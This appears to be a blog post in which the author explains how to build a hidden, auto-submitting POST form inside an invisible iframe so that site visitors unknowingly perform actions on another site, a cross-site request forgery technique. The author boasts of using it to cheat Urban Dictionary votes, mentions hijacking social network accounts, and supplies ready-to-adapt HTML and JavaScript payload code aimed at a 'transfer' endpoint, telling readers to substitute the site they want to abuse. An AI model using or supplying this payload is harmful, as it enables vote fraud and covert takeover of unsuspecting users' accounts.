Submitting forms automatically can be very useful when you want a visitor of your site to perform an action without ever knowing about it. This could be used for something as innocent as cheating an online vote system or something more nefarious such as hijacking social network accounts.
Back in October 2010, I wrote about cheating urbandicitonary with iframes; by having your sites visitors automatically vote up your keyword without ever knowing about it. A couple of weeks after that post, Urbandictionary changed their website to use POST rather than GET, meaning the iframe method would no longer work.
Did that stop me from voting myself up on urbandictionary? Of course not! GET requests are simpler, since you only need to place an iframe on the page, but POST requests can also be easy, when you know how!
Building the form
For this example, I’ll be using a made up form, you need to swap out the action URL and form fields with those on the site you’re looking to abuse.
The first step is to build a regular HTML form:
<form id="ponyo_form" action="http://www.website.com/transfer" method="POST"> <input type="text" name="id" value="10" /> <input type="text" name="transfer_email" value="email@example.com" /> </form>
The code above is enough for a simple proof of concept. But if you were to put it onto a site, you’d realise two things, 1) The form is visible to the user and 2) When the form is submitted, the page redirects to wherever the form was submitted to.
We get around the redirect issue by adding a ‘target’ attribute to the form which references an iframe. So instead of the page having to change, the result will actually be loaded into an iframe.
We then place the whole thing inside a div which is set to display:none; so that the visitor can’t see what’s going on.
<div style="display:none;"> <iframe id="ponyo_frame" name="ponyo_frame"></iframe> <form id="ponyo_form" method="POST" action="http://www.website.com/transfer" target="ponyo_frame"> <input type="text" name="id" value="10" /> <input type="text" name="transfer_email" value="firstname.lastname@example.org" /> </form> <script> document.getElementById("ponyo_form").submit(); </script> </div>